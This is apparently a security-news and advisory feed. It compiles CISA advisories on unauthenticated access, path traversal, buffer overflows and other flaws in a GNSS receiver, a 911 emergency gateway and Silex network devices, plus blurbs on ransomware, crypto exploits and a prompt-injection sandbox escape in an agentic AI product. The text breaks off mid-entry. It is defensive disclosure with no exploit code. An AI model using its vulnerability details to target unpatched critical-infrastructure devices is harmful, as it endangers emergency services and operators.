View CSAF Summary Successful exploitation of this vulnerability could enable a remote attacker to alter critical system functions or disrupt device operation. The following versions of Carlson Software VASCO-B GNSS Receiver are affected: VASCO-B GNSS Receiver <1.4.0 (CVE-2026-3893) CVSS Vendor Equipment Vulnerabilities v3 9.4 Carlson Software Carlson Software VASCO-B GNSS Receiver Missing Authentication for Critical Function Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: United States Vulnerabilities Expand All + CVE-2026-3893 The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials. View CVE Details Affected Products Carlson Software VASCO-B GNSS Receiver Vendor: Carlson Software Product Version: Carlson Software VASCO-B GNSS Receiver: <1.4.0 Product Status: known_affected Remediations Mitigation Carlson Software recommends users update to Version 1.4.0 or greater. For more information contact Carlson Software https://www.carlsonsw.com/support-and-training/ https://www.carlsonsw.com/support-and-training/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.4 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H Acknowledgments Souvik Kandar reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-23 Date Revision Summary 2026-04-23 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of this vulnerability could allow an attacker to read, modify, or delete files. The following versions of Intrado 911 Emergency Gateway (EGW) are affected: Emergency Gateway 7.x (CVE-2026-6074) Emergency Gateway 6.x (CVE-2026-6074) Emergency Gateway 5.x (CVE-2026-6074) CVSS Vendor Equipment Vulnerabilities v3 9.8 Intrado Intrado 911 Emergency Gateway (EGW) Path Traversal: '.../...//' Background Critical Infrastructure Sectors: Emergency Services Countries/Areas Deployed: Worldwide Company Headquarters Location: United States Vulnerabilities Expand All + CVE-2026-6074 A path traversal condition in Intrado 911 Emergency Gateway could allow an attacker with existing network access the ability to access the EGW management interface without authentication. Successful exploitation of this vulnerability could allow a user to read, modify, or delete files. View CVE Details Affected Products Intrado 911 Emergency Gateway (EGW) Vendor: Intrado Product Version: Intrado Emergency Gateway: 7.x, Intrado Emergency Gateway: 6.x, Intrado Emergency Gateway: 5.x Product Status: known_affected Remediations Mitigation Intrado developed and released a software update on March 2nd, 2026, that addresses this issue and has contacted customers to coordinate applying the patch. Mitigation If you have questions, contact Intrado E911 Support: E911Support@intrado.com mailto:E911Support@intrado.com Relevant CWE: CWE-35 Path Traversal: '.../...//' Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Acknowledgments An anonymous source reported this vulnerability to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-23 Date Revision Summary 2026-04-23 1 Initial Publication Legal Notice and Terms of Use

The proof of concept revealed AI-based attacks unfold too fast for human defenders to respond, and that AI evinced more autonomous behavior than expected.

The volume of cyberattacks targeting Africa declined in the past year, with weekly attacks down 22%, as attackers seemingly shifted their focus to other regions.

CertiK has urged crypto users not to overlook basic security practices as major crypto hacks spiked in April.

Not nearly as polite as the name suggests, the ransomware gang has impressed researchers with its speed in scaling up operations — and its sophistication.

A new Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection vulnerability affecting D-Link DIR-823X routers, to enlist devices into the botnet. [...]

The French government agency that issues and manages national IDs, passports, and other documents announced that hackers stole the personal information of an unspecified number of citizens.

A new Kyber ransomware operation is targeting Windows systems and VMware ESXi endpoints in recent attacks, with one variant implementing Kyber1024 post-quantum encryption. [...]

A compromised developer's repository serves as a worm-like infection vector to spread remote access Trojans (RATs) and other malware.

IT has long been concerned with ensuring systems receive the right amount of electricity. Cyberattackers are realizing they can manipulate voltage fluctuations for their purposes, too.

Security researchers linked a new “Mach-O Man” malware kit to a Lazarus campaign that uses fake meeting invites and ClickFix prompts to steal credentials and access corporate systems on macOS.

Aave’s supplied balance has tanked since the Kelp DAO bridge exploit, as users pull funds amid uncertainty over how much of the rsETH-linked shortfall the protocol will ultimately absorb.

A new supply chain attack targeting the Node Package Manager (npm) ecosystem is stealing developer credentials and attempting to spread through packages published from compromised accounts. [...]

DPRK-linked crypto theft topped $578M in April after the Kelp DAO exploit, as attacks continue to expand across protocols, companies and end users.

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-33825 Microsoft Defender Insufficient Granularity of Access Control Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

A Linux variant of the GoGra backdoor uses legitimate Microsoft infrastructure, relying on an Outlook inbox for stealthy payload delivery. [...]

Volo Protocol has confirmed a $3.5 million exploit affecting select vaults, adding that it has frozen assets and started fund recovery efforts amid ongoing investigation.

Microsoft has released out-of-band (OOB) security updates to patch a critical ASP.NET Core privilege escalation vulnerability. [...]

Over 1,300 Microsoft SharePoint servers exposed online remain unpatched against a spoofing vulnerability that was exploited as a zero-day and is still being abused in ongoing attacks. [...]

France Titres, the government agency in France for issuing and managing administrative documents has disclosed a data breach after a threat actor claimed the attack and stealing citizen data. [...]

A cautionary tale illustrates why the person negotiating should never be involved with any part of the ransom payment process.

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.  Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Mozilla Thunderbird is an email client. Mozilla Thunderbird ESR is a version of the email client intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Three proof-of-concept exploits are being used in active attacks against Microsoft's built-in security platform; two are unpatched.

A previously undocumented data-wiping malware dubbed Lotus was used last year in targeted attacks against energy and utilities organizations in Venezuela. [...]

The critical remote code execution flaw (CVE-2026-1731) in the remote monitoring and management tool can be exploited to spread ransomware and compromise supply chains.

The prompt-injection vulnerability in the agentic AI product for filesystem operations was a sanitization issue that allowed for sandbox escape and arbitrary code execution.

A 24-year-old British national and senior member of the cybercrime group "Scattered Spider" has pleaded guilty to wire fraud conspiracy and aggravated identity theft. Tyler Robert Buchanan admitted his role in a series of text-message phishing attacks in the summer of 2022 that allowed the group to hack into at least a dozen major technology companies and steal tens of millions of dollars worth of cryptocurrency from investors.

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code, cause a denial-of-service, or configuration information may be altered without authentication. The following versions of Silex Technology SD-330AC and AMC Manager are affected: SD-330AC <=1.42 (CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, CVE-2026-32958, CVE-2015-5621, CVE-2026-32959, CVE-2026-32960, CVE-2026-32961, CVE-2026-32962, CVE-2024-24487, CVE-2026-32963, CVE-2026-32964, CVE-2026-32965) AMC Manager <=5.0.2 (CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, CVE-2026-32958, CVE-2015-5621, CVE-2026-32959, CVE-2026-32960, CVE-2026-32961, CVE-2026-32962, CVE-2024-24487, CVE-2026-32963, CVE-2026-32964, CVE-2026-32965) CVSS Vendor Equipment Vulnerabilities v3 9.8 Silex Technology Silex Technology SD-330AC and AMC Manager Stack-based Buffer Overflow, Heap-based Buffer Overflow, Missing Authentication for Critical Function, Use of Hard-coded Cryptographic Key, Dependency on Vulnerable Third-Party Component, Use of a Broken or Risky Cryptographic Algorithm, Sensitive Information in Resource Not Removed Before Reuse, Incorrect Privilege Assignment, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Neutralization of CRLF Sequences ('CRLF Injection'), Initialization of a Resource with an Insecure Default Background Critical Infrastructure Sectors: Information Technology Countries/Areas Deployed: Worldwide Company Headquarters Location: Japan Vulnerabilities Expand All + CVE-2026-32955 A Stack-based Buffer Overflow vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to execute arbitrary code on the device. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-121 Stack-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2026-32956 A Heap-based Buffer Overflow vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to execute arbitrary code on the device. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-32957 A Missing Authentication for Critical Function vulnerability in Silex Technology SD-330AC and AMC Manager could allow uploads of arbitrary files to the device without authentication. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2026-32958 A Use of Hard-coded Cryptographic Key vulnerability in Silex Technology SD-330AC and AMC Manager could cause an administrative user to be directed to apply a fake firmware update. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32958 and CVE-2026-32965: Set a password for the settings web interface. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-321 Use of Hard-coded Cryptographic Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N CVE-2015-5621 The snmp_pdu_parse function in snmp_api.c in net-snmp 5.7.2 and earlier does not remove the varBind variable in a netsnmp_variable_list item when parsing of the SNMP PDU fails, which allows remote attackers to cause a denial of service (crash). View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2015-5621: Disable SNMP service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-1395 Dependency on Vulnerable Third-Party Component Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-32959 A Use of a Broken or Risky Cryptographic Algorithm vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to retrieve information via a man-in-the-middle attack. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-327 Use of a Broken or Risky Cryptographic Algorithm Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2026-32960 A Sensitive Information in Resource Not Removed Before Reuse vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to send specially crafted packets that may allow the attacker to login to the device. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-226 Sensitive Information in Resource Not Removed Before Reuse Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N CVE-2026-32961 A Heap-based Buffer Overflow vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to send specially crafted packets that may cause a temporary denial-of-service (DoS) condition. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVE-2026-32962 A Missing Authentication for Critical Function vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to alter the device configuration without authentication. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVE-2024-24487 An issue discovered in Silex Technology DS-600 Firmware v.1.4.1 allows a remote attacker to cause a denial of service via crafted UDP packets using the EXEC REBOOT SYSTEM command. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-266 Incorrect Privilege Assignment Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:H CVE-2026-32963 An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to trick a user into accessing a special web page and execute arbitrary script on the user's browser. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32955, CVE-2026-32956, CVE-2026-32957, and CVE-2026-32963: Disable HTTP/HTTPS service. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVE-2026-32964 An Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker to inject arbitrary entries into the system configuration. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English 